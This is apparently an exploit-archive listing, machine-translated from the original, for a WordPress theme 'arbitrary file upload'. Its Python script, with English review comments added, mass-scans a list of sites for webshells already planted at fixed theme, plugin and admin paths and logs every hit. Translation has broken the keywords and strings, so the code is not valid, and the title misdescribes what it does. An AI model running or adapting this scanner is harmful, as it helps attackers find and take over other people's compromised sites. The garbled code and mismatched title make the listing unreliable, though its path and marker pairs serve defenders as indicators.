
WordPress主题TravelsCape v1.0.3-任意文件上传

#利用标题: WordPress主题TravelsCape v1.0.3-任意文件上传
#日期: 2024-04-01
#作者: Milad Karimi(Ex3ptional)
#类别: WebApps
#测试在: Windows 10,Firefox
导入系统
导入OS.Path
导入请求
导入
导入urllib3
从请求。
从多处理。dummyImport Pool作为threadpool
从Colorama进口,初始
# NOTE(review): this listing was machine-translated. Keywords, keyword-argument
# names and parts of some string literals were altered, so the code is not
# valid Python as shown and the literals below may differ from the original.
# Console colour setup; presumably colorama's init(autoreset=True) and its
# Fore constants before translation -- confirm against the original script.
init(autoret=true)
error_color=fore.red
info_color=fore.cyan
success_color=fore.green
righlight_color=fore.magenta
# Turns off urllib3 warnings for the whole process. Several requests further
# down pass verify=false, i.e. they skip TLS certificate validation; this call
# presumably exists to hide the warning that would otherwise be printed.
requests.urllib3.disable_warnings()
# Fixed header set passed to every requests.get() call in check_security.
# Defender's view: the values are static (same User-Agent, Accept-Language and
# a Referer of 'www.google.com' on every request), which makes the traffic
# easy to group in access logs. The User-Agent literal on this page was
# altered by translation, so do not copy it verbatim into a detection rule.
标题={
'Connection':'keep-alive',
'cache-control':'max-age=0',
'升级- 不肯定- 重新要求':'1',
'用户代理:'Mozilla/5.0(Linux; Android 7.0; SM-G892A构建/NRD90M;
WV)AppleWebkit/537.36(Khtml,像壁虎一样)版本/4.0 Chrome/60.0.3112.107
移动野生动物园/537.36',
'Accept':
'text/html,application/xhtml+xml,application/xml; q=0.9,image/webp,image/apng,/; q=0.8',
'接受编码:'gzip,deflate',
'Accept-Language':'En-us,en; q=0.9,fr; q=0.8',
'Referer':'www.google.com'
}
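def urldomain(url):
    """Return the host part of *url*.

    A leading ``http://`` or ``https://`` is dropped, then everything from
    the first ``/`` onwards is discarded. A port or ``user@`` prefix, if
    present, is left in the result; the input is not validated in any way.

    The keywords of this function were altered by machine translation on
    the page (``DEF``, ``Elif``, translated ``if``/``return``); this body
    restores valid Python under the name the callers use.
    """
    if url.startswith('http://'):
        url = url.replace('http://', '')
    elif url.startswith('https://'):
        url = url.replace('https://', '')
    # Keep only what precedes the first path separator.
    if '/' in url:
        url = url.split('/')[0]
    return url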
# check_security(url): request a fixed list of paths on one site and record
# which of them answer with a known marker string.
#
# For each path the code sends a GET with the shared header set, looks for a
# marker substring in the response body (for example 'MSQ_403', 'uname:',
# '#0x2525'), prints a success or failure line, and on a match appends the
# full URL to a local text file (MSQ_403.TXT, wso.txt, Digital-download.txt,
# dummyymy.txt).
#
# NOTE(review): nothing in this function uploads a file, although the page
# title says "arbitrary file upload". It only requests files that would
# already have to exist on the server. The paths also cover several theme
# directories (travelscape, aahana, travel, digital-download), one plugin
# directory (dummyymy) and files under the site root and /wp-admin/, not only
# the TravelsCape theme named in the title.
#
# Defender's view: the path and marker pairs below can be used as indicators.
# An unexpected .php file at one of these locations, or access-log entries
# requesting them, is a reason to examine the host for an earlier compromise.
#
# NOTE(review): the listing is machine-translated and lost its indentation, so
# it cannot be determined from the page which check each `其他:` (else) branch
# belongs to.
def check_security(url):
fg=success_color
fr=error_color
TRY:
# The input is reduced to its host part and a scheme is forced: plain http
# here, https for several of the later requests.
url='http://' + urldomain(url)
check=requests.get(url +
'/wp-content/themes/travelscape/json.php',标头=标题,
laster_redirects=true,超时=15)
如果在check.text:中'MSQ_403'
print(' - |' + url +' - {} [成功]'。格式(FG))
打开('MSQ_403.TXT','a')。写(url +
'/wp-content/themes/travelscape/json.php \ n')
其他:
url='https://' + urldomain(url)
# verify=false: TLS certificate validation is skipped for this request.
check=requests.get(url +
'/wp-content/themes/aahana/json.php',标头=标题,
allow_redirects=true,验证=false,timeout=15)
如果在check.text:中'MSQ_403'
print(' - |' + url +' - {} [成功]'。格式(FG))
打开('MSQ_403.TXT','a')。写(url +
'/wp-content/themes/aahana/json.php \ n')
其他:
print(' - |' + url +' - {} [失败]'。格式(fr))
check=requests.get(url +'/wp-content/themes/travel/issue.php',
标题=标题,允许_redirects=true,超时=15)
如果“ yanz webshell!”在check.text:中
print(' - |' + url +' - {} [成功]'。格式(FG))
打开('wso.txt','a')。写(url +
'/wp-content/themes/travel/issue.php \ n')
其他:
url='https://' + urldomain(url)
check=requests.get(url +'/about.php',标头=标题,
laster_redirects=true,超时=15)
如果“ yanz webshell!”在check.text:中
print(' - |' + url +' - {} [成功]'。格式(FG))
打开('wso.txt','a')。写(url +'/about.php \ n')
其他:
url='https://' + urldomain(url)
check=requests.get(url +
'/wp-content/themes/digital-download/new.php',标头=标题,
laster_redirects=true,超时=15)
如果在check.text:中'#0x2525'
print(' - |' + url +' - {} [成功]'。格式(FG))
打开('Digital-download.txt','a')。写(url +
'/wp-content/themes/digital-download/new.php \ n')
其他:
print(' - |' + url +' - {} [失败]'。格式(fr))
url='http://' + urldomain(url)
check=requests.get(url +'/epinyins.php',标头=标题,
laster_redirects=true,超时=15)
如果在check.text:中'uname:'
print(' - |' + url +' - {} [成功]'。格式(FG))
打开('wso.txt','a')。写(url +'/epinyins.php \ n')
其他:
print(' - |' + url +' - {} [失败]'。格式(fr))
url='https://' + urldomain(url)
check=requests.get(url +'/wp-admin/dropdown.php',
标题=标题,允许_redirects=true,verify=false,timeout=15)
如果在check.text:中'uname:'
print(' - |' + url +' - {} [成功]'。格式(FG))
打开('wso.txt','a')。写(url +'/wp-admin/dropdown.php \ n')
其他:
url='https://' + urldomain(url)
check=requests.get(url +
'/wp-content/plugins/dummyymy/wp-signup.php',标头=标题,
allow_redirects=true,验证=false,timeout=15)
如果check.text:中的“简单壳”
print(' - |' + url +' - {} [成功]'。格式(FG))
打开('dummyymy.txt','a')。写(url +
'/wp-content/plugins/dummyymy/wp-signup.php \ n')
其他:
print(' - |' + url +' - {} [失败]'。格式(fr))
# Catch-all handler: any exception is printed as a failure for this URL.
# Presumably a single try wraps the whole sequence, so the first failing
# request ends the remaining checks for that site -- confirm against the
# original indentation.
除异常外,E:
print(f' - | {url} - {fr} [失败]由于: {e}')
# main(): read a list of URLs from a file and run check_security on each.
#
# The file path comes from sys.argv[1], or from an interactive prompt when no
# argument was given. The path is checked to be an existing file, each line is
# stripped and treated as one URL, and the list is mapped over check_security
# with a pool of 20 workers. On a bad path or a read error the script prints a
# message and exits with status 1.
#
# Defender's view: every listed site receives the same fixed sequence of
# requests with the same static headers, so hits can be correlated across
# hosts by path set and header values.
# NOTE(review): the listing is machine-translated and not valid Python as
# shown (translated keywords, strings split across lines).
def main():
TRY:
url_file_path=sys.argv [1]
除了IndexError:
url_file_path=input(f'{info_color}输入文件的路径
包含URLS:')
如果不是OS.Path.Iffile(url_file_path):
print(f'{error_color} [错误]指定的文件路径为
无效的。')
sys.exit(1)
TRY:
urls_to_check=[line.strip()for open中的行(url_file_path,'r',
编码='utf-8')。readlines()]
除异常外,E:
print(f'{error_color} [错误]阅读时发生了错误
file: {e}')
sys.exit(1)
# 20 worker threads; pool.map blocks until every URL has been processed.
pool=threadpool(20)
pool.map(check_security,urls_to_check)
pool.close()
pool.join()
打印(f'{info_color}安全检查过程成功完成。
结果保存在相应的文件中。”)
# Script entry guard, garbled by translation; presumably
# `if __name__ == '__main__': main()` in the original.
如果name=='__ -Main __':
主要的()
 